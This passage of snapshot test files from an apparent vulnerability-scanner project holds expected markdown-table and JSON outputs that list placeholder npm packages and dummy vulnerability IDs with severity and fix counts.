https://osv.dev/GHSA-123 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package,_one_vulnerability,_and_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | 9 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_one_called_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_one_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | Uncalled vulnerabilities | | | | | | | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_one_vulnerability_(dev) - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_uncalled_vulnerability - 1] Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | Uncalled vulnerabilities | | | | | | | | https://osv.dev/OSV-1
https://osv.dev/GHSA-123 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_with_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1
https://osv.dev/GHSA-123 | 8.3 | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_and_two_aliases_of_a_single_vulnerability_without_a_max_severity - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1
https://osv.dev/GHSA-123 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_with_both_a_version_and_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_one_package_with_just_a_commit_and_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/one_source_with_vulnerabilities,_some_missing_content - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-2 | | npm | mine3 | 0.10.2-rc | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/two_sources_with_packages,_one_vulnerability - 1] Total 1 package affected by 1 known vulnerability (0 Critical, 0 High, 0 Medium, 0 Low, 1 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | --- [TestPrintMarkdownTableResults_WithVulnerabilities/two_sources_with_the_same_vulnerable_package - 1] Total 2 packages affected by 2 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 2 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. | OSV URL | CVSS | Ecosystem | Package | Version | Fixed Version | Source | | --- | --- | --- | --- | --- | --- | --- | | https://osv.dev/OSV-1 | | npm | mine1 | 1.2.3 | -- | path/to/my/first/lockfile | | https://osv.dev/OSV-1 | | npm | mine1 (dev) | 1.2.3 | -- | path/to/my/second/lockfile | --- ================================================ FILE: internal/output/__snapshots__/output_result_test.snap ================================================ [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.2", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 6, "OS": 0, "Project": 6, "Hidden": 0 }, "PackageTypeCount": { "Regular": 4, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 6, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 6 }, "FixableCount": { "Fixed": 0, "UnFixed": 6 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_and_multiple_vulnerabilities - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.2", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 2, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 6, "OS": 0, "Project": 6, "Hidden": 0 }, "PackageTypeCount": { "Regular": 4, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 6, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 6 }, "FixableCount": { "Fixed": 0, "UnFixed": 6 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_no_vulnerabilities - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 }, { "Name": "unknown:/path/to/my/third/lockfile", "Type": "unknown", "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.3.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 0, "OS": 0, "Project": 0, "Hidden": 0 }, "PackageTypeCount": { "Regular": 0, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages,_some_vulnerabilities - 1] { "Ecosystems": [ { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", 